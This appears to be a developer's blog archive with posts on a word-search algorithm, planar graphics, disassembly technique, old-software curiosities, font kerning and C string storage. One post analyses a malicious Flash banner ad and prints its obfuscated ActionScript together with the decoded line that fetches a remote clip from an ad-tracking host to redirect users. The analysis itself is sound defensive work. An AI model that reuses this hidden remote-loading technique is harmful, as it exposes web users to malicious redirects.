2019-09-24

A Word Search Generator

A while ago I needed to generate a daily word search using a word list that was unique for each day.  I didn't find anything online so I invented my own algorithm.  It is designed to encourage words to overlap as much as possible.

The setup for the algorithm is very simple and a bit boring, so I'll just cover the basics here.  The two things we need before we begin is a list of words to put in the word search, as well as the dimensions of the letter grid.  For my implementation, the dimensions and a file containing a whitespace-separated list of words were passed in as arguments.

The word list also needs one other, non-obvious thing.  You need to make sure that none of the words in the word list are substrings of any other words in the word list.  Be sure to check for reverse matches as well.  For example, "times" and "emit" would be very confusing to search for.

Then before we hit the main algorithm, we sort the word list by length, with the longest words first.  We then loop through all the words in the word list and attempt to insert them into the grid.  If we succeed, we mark the word as used so we can later print it out as part of the clue list.

for (word : words) {
  if (addWord(grid, word)) {
    word.wasUsed = true;
  }
}

To add a word to the grid, we first loop through every cell in the grid.  We check to see if the cell is blank or if the cell matches the first letter of our given word.  If either of these are true, we measure the score for that position.  Then we move onto the next cell.

addWord(grid: Grid, word: Word): bool {
  bestScore = 0;
  for (y := 0..grid.height) {
    for (x := 0..grid.width) {
      if (grid.cell(x, y) == Blank || grid.cell(x, y) == word[0]) {
        measure(grid, word, x, y);
      }
    }
  }
  // random best fit goes here
  ...
}

To measure the score, we try to place the word in the grid at that location in all directions.  We then calculate a score based on the number of intersections for a given direction.

measure(grid: Grid, word: Word, x: int, y: int) {
  for (dy : [-1, 0, 1]) {
    for (dx : [-1, 0, 1]) {
      if (dx == 0 && dy == 0) {  // no direction
        continue;
      }
      ex := x + word.length * dx;
      ey := y + word.length * dy;
      if (ex < 0 || ex >= grid.width ||
          ey < 0 || ey >= grid.height) {  // word doesn't fit
        continue;
      }
      int score = 1;
      for (i := 0..word.length) {
        cell := grid.cell(x + i * dx, y + i * dy);  // next cell
        if (cell == word[i]) {  // matches word
          score++;
        } else if (cell != Blank) {  // word doesn't fit here at all
          score = 0;
          break;
        }
      }
      if (score >= bestScore) {  // are we among the best matches?
        if (score > bestScore) {
          bestScore = score;
          matches.clear();  // new tier of best scoring matches
        }
        matches.add(Match(x, y, dx, dy));
        if (dx && dy) {  // we want diagonals, so add twice
          matches.add(new Match(x, y, dx, dy));
        }
      }
    }
  }
}

This is the core of the algorithm, so we should look at it at little closer.  We loop through all the directions, which is where dx and dy are one of -1, 0, 1.  If both dx and dy are 0, then that doesn't point in any direction, so we skip that case.  We calculate the end position of the word for the current direction and check to see if it fits on the grid.  If not, we skip that direction.

Next we calculate the score for that direction.  Encountering a cell already containing a matching letter is worth 1 point.  This encourages intersecting words.  If we encounter a cell with a different letter, we reset the score to zero and move on since the word doesn't actually fit there.

If the score is among the best scores, we add our current orientation to the list of matches.

What we end up with is a list of all the highest scoring orientations.  Given the choice between a horizontal or vertical match and a diagonal match, we would prefer the diagonal match.  Thus, we've added any diagonal matches to the high-score list twice.

Note that we haven't actually placed the word on the grid yet.. we've just calculated a list of best places to put it.

After we have tested every cell in the grid, we now have a list of possible places to put that word.  If we don't have any, that means the word doesn't fit anywhere in the grid and we should abandon that word and move onto the next.

If we do have a list of possibilities, we should pick a random one and then place the word into the grid.  Then move onto the next word.

Finally, after we have added all possible words to the grid, we loop through the grid and fill out any blanks with random letters.

Then you can output the grid and marked words.

Possible improvements could be the inclusion of red herrings.  When filling in the blanks with random letters, you could use letters from the word list to make "almost" matches.  It's also trivial to make the grid a random shape.  Just take the grid and before you do anything, fill in any blank spaces with a special character.  Then replace the special character with a blank on the final grid.

2019-02-15

Oldschool planar graphics and why they were a good idea

Oldschool planar graphics

If you ever work with old hardware, like writing an NES emulator or reverse engineering an old Amiga game, you will inevitably come across planar graphics modes.

These days, with loads of memory and huge color depths, graphics are stored sequentially.  It makes the most logical sense.  The red, green, and blue values for each pixel are just stored in an array, in some predefined order (RGB, BGR, whatever).  There may even be an alpha channel.

Video cards of yesteryear didn't have access to that much ram, so direct color, requiring 3 or 4 bytes of ram per pixel, was out of the question. 

Those old video cards used a palette-based system instead.  There's a palette with the red, green, and blue values of each color.  Then the image data itself is just an array of indices into the palette.  With 256 colors, we can use a single byte per pixel.

This is all very straight forward so far.  However, even 256 colors was extravagant for some older hardware.

What if you only had 16 colors?

With 16 colors, we only need 4 bits per pixel for the indices.  That means that a single byte can modify 2 pixels on the screen.  This works out rather well, since the width of each video mode is always going to be an even number.  With 16 colors, images take up exactly half the amount of space as if we had 256 colors.  The only thing you'd really need to worry about is whether the low nibble (4 bits) is drawn first, or the high nibble?  That of course would be up to the hardware to decide.  Regardless, the sequential palette based system still works.

32-colors - the problem child!

With 32 colors, things get difficult.  We technically only need 5 bits per pixel for the indices, but you cannot really cut up an array of bytes into 5-bit chunks easily.  You could pad it, so that each byte contains the index, but now you're wasting 3 bits per pixel.  That's a lot of space to be wasting.

You could try to cram it all together, so the first 5 bits of the first byte represent the first pixel, and the top 3 bits represent the bottom 3 bits of the second pixel, and the bottom 2 bits of the second byte represent the top 2 bits of the second pixel, and so on.  This is a disaster.  Addressing individual pixels is now a total nightmare.

So our options are waste space, or make addressing suck.

Planes to the rescue!

This is where planar graphics come in to save the day.  Instead of trying to pack all the bits of the indices together, we spread them out across planes. 

A plane is a 1 bit per pixel array.  So any byte of a plane controls 8 pixels.  For 32-colors, we need 5 bits per pixel, so we need 5 planes.

The first plane contains the lowest bits of all pixels.  The second plane contains the second lowest bits of all pixels, and so on.  So to modify the 3rd pixel on the screen, you would modify bit 3 of the first byte of every plane.

It's a bit more complicated than sequential storage, but it's still easy to address a specific pixel (byte = position / 8, bit = position & 7), and it saves a ton of RAM.  Imagine a 320x200 screen with 32 colors.  If we had padded each pixel out, it would require 64,000 bytes.  With planes, we only need (320 * 200 / 8) bytes per plane, with 5 planes, comes to just 40,000 bytes.

Another reason for planes

While planes were super useful for odd bit-length palette sizes like 32 colors, they were also used for expansion reasons.  Let's say we made a system with 16 colors, but intended to upgrade the system later on to 32 colors.

If we made the 16-color system use planar graphics instead of storing the indices in the low and high nibble of each byte, then going to 32-colors only requires adding a new plane somewhere in RAM. The older 16-color games would still work, they just wouldn't ever reference the 16 newer colors in the palette (assuming the new plane was initialized to 0 by the system).

With systems like the Amiga, software could even specify how many planes it wanted to use, and the hardware addressing doesn't even have to change to accommodate it.

2016-12-13

Understanding larger disassembly

This past weekend I was disassembling something and it struck me how few people knew how to do what I was doing.

So I figured I would quickly document the process of taking a chunk of disassembled code and putting it into a format that's easier to understand.

The disassembly I'm going to use for my examples is the same disassembly I was working on this weekend.  It is the music playing routines from some Apple IIgs software.

There is some knowledge that you should have before attempting to parse disassembly on any platform.

You should be familiar with the assembly language for your target platform.

Since this code ran on an Apple IIgs, that means you should know 65816 assembly.  If you know 6502 assembly, you're more than halfway there.  The 65816 is a 16-bit successor to the 6502, and is backwards compatible.  There's just a few more opcodes and addressing modes, as well as some additional flags for switching between 8-bit and 16-bit registers.

You should understand how hardware is used on your target platform.

For example, if you're disassembling software that draws to the screen, you should know how the various video modes work and how video memory is laid out.  Since we're disassembling a music player, we should know how the sound card works.

I'm not going to cover how the IIgs sound card works here, if you care, the Apple IIgs Technical Reference covers it.

Locate the code you're interested in.

This is one of the more difficult things to do.  You can't just disassemble an entire executable and hope to parse it all at once, it's far too big.  Instead you need to use some techniques to narrow down your search.

For example, if you're trying to figure out a file format for some file the program uses, you should search the disassembly for OS file calls and then work your way backwards from those calls.

If you're trying to find out how a program does some special graphical effect, then maybe check for code attached to the video blank interrupt (if it has one, again, know your platform).

For our example, we want to find the routine that's tied to the sound interrupt. This interrupt is fired whenever one of the soundcard's channels stops playing a note.  This is the natural place where you would advance the song and set up the soundcard to play the next note.  (Again, know your platform).

Searching through the disassembly I find the following:

00/3b84: a9 5c 98    lda  #$985c
00/3b87: 8f 2c 00 e1 sta  $e1/002c   ; Sound interrupt
00/3b8b: a9 3c 00    lda  #$003c
00/3b8e: 8f 2e 00 e1 sta  $e1/002e

This installs the sound interrupt routine.  It actually stores 5c 98 3c 00 into that memory location.  This is machine code that translates into the assembly "jmp $00/3c98".  So we now know that $3c98 in bank $00 is the sound interrupt routine that we want to understand.

The code next to where the sound interrupt is installed also loads the music into a specific location in RAM, loads all the sample data into the sound RAM, and sets some variables.  You would want to disassemble this routine as well as it paints a clearer picture of what's happening with everything sound-related.  I won't do that here, but this is how I was able to better understand the sound interrupt routine.

Isolate the code you care about, once you've found it.

So now we know the function we care about, we're going to isolate it and any small functions that the code calls.  This helps get rid of noise.

I've got the code we care about uploaded here.  It's 528 lines of assembly.  That's a pretty healthy sized routine.

One thing I'll point out before we get into it.  There are two small routines at $3cd4 and $3cd9 that seem to be redundant and return the value in a table located at $00:0000 (which is a total red flag that something is horribly wrong).  That's not correct.  The function that sets up the sound interrupt routine also replaces those zeroed addresses with calculated addresses into the music data.

That's another lesson.  Assembly programmers will modify program code instead of setting a variable, all just to save a memory access later on.

So how do we begin?  Do we just step through the assembly and see what it's doing?  Well, that's certainly an option, and for smaller routines, I have no problem doing this.  However, with longer routines, you'll want to do what you can to see the structure of the routine.

Visualize the structure of the routine.

I mean that literally.  The best way I've found to do this is to break the assembly up into what's known as "basic blocks".  A basic block is a chunk of contiguous assembly with only a single entry point (at the head), and exit point (at the tail).  You then draw connections between chunks.

There is software that will automatically do this.  It's the first step in a higher-level decompiler.  However, that software is either specific to an architecture, or expensive, or both.  Luckily, it's rather easy to do it by hand.

I like to use GraphViz for this.  It's a simple command-line tool that takes a text file and generates a directed graph from it.

Here's the first two basic blocks from our assembly plotted:

digraph {
  node[shape="record" fontname="helvetica"];
  edge[fontname="helvetica" fontsize=9];
  m3c98 [label="$3c98|$3c9c"];
  m3c98 -> m3c9d;
  m3c9d [label="$3c9d|$3ca0"];
  m3c9d -> m3c9d [label="bmi"];
  m3c9d -> m3ca2;  
}


We start with a node called "m3c98".  This is the very first address in the routine.  It's prefixed with "m" just because node names cannot start with a number.  The node has a label that has 2 records, these records are the entry and exit addresses of the basic block.  This is immediately followed by a connection from this basic block to the next basic block.

You can see how I've also added a label to one of the edges.  If a jump between basic blocks is caused by a branch instruction, I'll put a label on it.  Unlabeled edges are implicit connections (m3c98 will automatically go to m3c9d without any branching).

Doing it this way is quick and easy, you can build the graph progressively as you go through the assembly looking for branches.  If you jump backwards into the middle of a basic block, it's trivial to split that basic block into two blocks and reassign the edges coming from original block to come from the new block instead.

The end result is this graph:

Full function graph


You can view the full size graph here.

This graph is useful, but it's a bit noisy.  Our next step is to clean up the graph.  We do this in several ways.  The first is to remove any useless blocks.  It's very common to find a branch that leads directly to a jump.  This creates a useless block.  So you can go through the graph, looking for any blocks that do this, and remove them.  Replace any edges pointing to that node to the target node of the removed block.

Another common thing, at least with this CPU architecture, is there are branches that lead to a basic block that does nothing but change between 8 bit and 16 bit mode, and then jump to another block.  Since we don't really care about this too much (the disassembler cared more), we can treat these as empty blocks and remove them as well.

Finally, you'll find nodes that do nothing but clean up the stack and then RET.  Instead of jumping to these blocks, we should go through and replace them with unique RET blocks.  That way you don't have all of these exit points all routed to couple of blocks, looking like part of the structure.

After you make these cleanups, you'll have a graph that looks like this:

Cleaned up graph

See the full size graph here.

This is much cleaner and easier to follow.

Analyze the structure of the routine.


There are patterns in this graph that correspond to programming structures that you are familiar with.

For example, this pattern is an IF statement.


IF statement
At the end of the block at $3e11, there is some comparison done.  The bpl tells us that we skipped a block if the result of some comparison was positive.

This can be structured as follows:

// at the end of the $3e11 block
if (result < 0) {
  // do $3e24 block
}
// do $3e27 block

The IF/ELSE statement is also easy to spot:

IF/ELSE statement

The beq tells us that if some result is zero, then we do the $40db block, otherwise we do the $40a9 block.

This can be structured as follows:

// at the end of the $40a5 block
if (result == 0) {
  // do $40db block
} else {
  // do $40a9 block
}
// do $40e7 block

Finally, loops (for loops, while loops, do/while loops) look like this:

WHILE loop


This is a case where a block points back at a previous block.  That's how you know it's a loop.  This particular one looks like a WHILE loop because the comparison happens in $3ec7 (i.e. first).  The bcs tells us there was most likely a comparison between two variables.

The structure then would be:

// $3ec7 block
while (something < somethingelse) {
  // 3ed3 block
}
// 3eda block

Using these simple patterns, it becomes rather easy to see the structure of the routine.

Convert disassembly into pseudocode


Now we begin the process of converting the disassembly into pseudocode.  This is a step-by-step process, and we use the basic block graph to help us organize the large structures.

For example, when you get to a basic block that has multiple other blocks from below pointing back up to it, you know it's the top of a loop.  You should open up a new block and mark it.  As you go along, you'll discover what type of loop it is and you can go back and clarify.

When you get to an IF/ELSE statement, you can scan through the tree and see where it will converge (of if it will converge).

 You may end up with criss-crossed blocks, which cannot be represented cleanly without GOTOs.  This is especially true of older programs that were likely written in assembly in the first place.  I would recommend using GOTOs in your pseudocode, and only after you grasp what is happening, refactor it into a structured routine.. duplicating code if necessary.

As you practice, you'll get better at spotting patterns in the structure.  Without much thought at all, I can see that the block at $3d67 is probably the same as the block at $4013.  They're likely both the bottom of the same FOR loop, and they're likely just duplicated because assembly programmers would do that.  At the very least, block $3d67 is a "continue" statement if block $4013 is indeed the bottom of a FOR loop.

The way I convert disassembly into pseudocode, is at the top of the file I keep a list of the globals.
They start out looking something like:

uint8_t d_4356;  // 4356

Then as I figure out what d_4356 is, based on usage, I'll go rename it:

uint8_t numInst;  // 4356

Whenever I come across a new memory address, I'll search for it, if it exists, I use its name, if it doesn't, I add it to the list.

For the opcodes themselves, I tend to build them out piece by piece.

Let's look at the beginning of the assembly.

It starts with a spinlock on the soundCtl.  I'll look up what the high-bit is and note it in a comment.

while (soundCtl & 0x80) {}  // wait for DOC to finish

Then it takes the result of soundCtl and ANDs it with $9f and stores it back into soundCtl.  Again, I'll look up what those bits do and comment it.

soundCtl &= 0x9f;  // DOC mode, no autoinc

and so on.  I'll have temporary variables for the accumulator and x and y indices, which will eventually get replaced with more complicated expressions to make them easier to follow.

And that's it.  The final pseudocode (basically C) for the sound interrupt routine is here.

2010-01-07

Found Data

I'm always interested in found data. Little notes buried in executables and other strange places. These are usually intended to be seen only by those curious enough to fire up a hex editor, or do a little reverse engineering.

Here's an example. On the 68k Macintosh, executables usually only have a resource fork. All the code is stored in CODE blocks in the resource fork. So I was curious when I found that the 68k mac version of Shadowgate had a data fork. The data fork contained the following message:

Welcome to TMON!
TMON was written in the summer of 1984 by Waldemar Horwat when he was still 15 years old. Initially TMON didn't have the heap and file windows; these were added later. TMON was very valuable in debugging itself. The biggest problem in writing TMON was making sure that it will not affect the Macintosh system in undesirable ways. Although some side effects couldn't be avoided, most have been eliminated. How are you able to read this message, anyway? Do you have a disk sector reader?

It's interesting to note that Waldemar Horwat did some programming on Shadowgate. So my guess is that this is evidence that he used his TMON debugger on Shadowgate. Later revisions of Shadowgate have had this data fork removed. I also found it in Uninvited, which is another ICOM game. No sign of it in Deja Vu 1 or 2, but I haven't been able to find anything but the 1992 reissues of those games.

2008-01-31

Web Font Shorts

A posting on reddit lead to a discussion on typefaces. In particular one poster asked about the kerning of a word. Surprisingly, the kerning was perfect for me. I decided to compare it across the browsers I have access to.

Here's the kerning in Firefox on Linux (Stock Ubuntu Gutsy):



Notice how the A and V overlap? That's correct kerning.

Here's how it looks in Firefox on OSX Tiger:



Aside from the overly aggressive anti-aliasing, see how the kerning is incorrect between the A and V. It looks the same in Safari 3.

Here it is again in Firefox on Vista:



Same kerning error. Looks the same in IE7.


So Linux gets it right, OSX and Windows get it wrong. We've come quite far.

2007-11-02

Malicious Banner Ad

We ran into a malicious banner ad yesterday. People would randomly get redirected to a malicious website. You can imagine that it's a pretty tough thing to diagnose. It turned out to be a flash ad. I was able to disassemble the banner ad to see how it worked. The banner is "protected" and compressed, so hex editing the banner doesn't show any text.


Using Flare to decompile the actionscript in the swf, I found this snippet of code:


this[(a2.split(' ')).join('')]('m1', this[(a3.split(' ')).join('')]());
_root[(a4.split(' ')).join('')][(a5.split(' ')).join('')]((a6.split(' ')).join(''),(a7.split(' ')).join('')) == (a8.split(' ')).join('') && this.m1[(a0.split(' ')).join('')]((a1.split(' ')).join('') + '&u=' + (new Date()).getTime());


Definitely looks like someone is trying to hide something, but there wasn't anything else in the actionscript.. certainly no getURLs or loadMovies.

I used the excellent swfmill program to convert the swf into xml. The output contains markup of every element in the swf. It was there that I found the source of a2,a3,a4, etc.


<DefineEditText objectID="5" wordWrap="0" multiLine="0" password="0" readOnly="1" autoSize="0" hasLayout="1" notSelectable="0" hasBorder="0" isHTML="0" useOutlines="0" fontRef="4" fontHeight="0" align="2" leftMargin="0" rightMargin="0" indent="0" leading="40" variableName="a0" initialText=" loadMovie">


There are text boxes (11 in all) all over the movie, they all are padded with hundreds of spaces at the beginning so they appear to be blank.

If you substitute out all splits and joins in the initial actionscript, you get the following:


createEmptyMovieClip('m1', getNextHighestDepth());
_url.substr(0,7)=="http://" &&
m1.loadMovie("http://adtraff.com/statsa.php?campaign=plentyup" + '&u=' + (new Date()).getTime());


So basically, this banner ad looks like a normal banner ad. However, each time you load it, it loads a movie clip from adtraff.com. Most of the time, this movie clip is blank. So you wouldn't notice a thing. However, sometimes the movie clip sent back from adtraff.com contains a getURL() that redirects the user to a malicious webpage like performanceoptimizer.com or malware-scan.com.

2007-09-06

char pointer versus char array

There are two basic ways to assign a string literal to a local variable.


char *p = "string";
char a[] = "string";


I was curious to see how gcc handles the two.

In both cases, "string" is put into .rodata This means that with the first method, you must not modify the contents of "string".


p[3]='o'; // this causes a segfault.


So technically, the first method should be:


const char *p = "string";


With the pointer method, gcc will initialize the variable using the following:

mov dword ptr [ebp-8], pointer_to_string


Calling a function and passing p will result in:

mov eax,[ebp-8]
mov [esp], eax
call function_name


With the array method, however, gcc reserves space for the string on the stack and will initialize the variable like so:

mov eax, [pointer_to_string]
mov [ebp-15h], eax
mov eax, [pointer_to_string+4]
mov [ebp-11h],eax
mov eax,[pointer_to_string+8]
mov [ebp-0dh],eax
movzx eax,byte ptr [pointer_to_string+12]
mov [ebp-9],al


As you can see, it moves the string into the stack 4 bytes at a time. If the string is more than 64 bytes long, then gcc will actually create a call to memcpy:

lea ecx,[ebp-49h]
mov edx, pointer_to_string
mov eax,41h
mov [esp+8],eax
mov [esp+4],edx
mov [esp],ecx
call wrapper_to_memcpy


Regardless of how long the string is, passing the array to a function results in the following:

lea eax,[ebp-15h]
mov [esp],eax
call function_name


Passing the variable around is virtually identical for both array and pointer. However, initializing the variable takes a huge performance and space penalty for the array. Only use the array method if you intend on changing the string, it takes up space in the stack and adds some serious overhead every time you enter the variable's scope. Use the pointer method otherwise.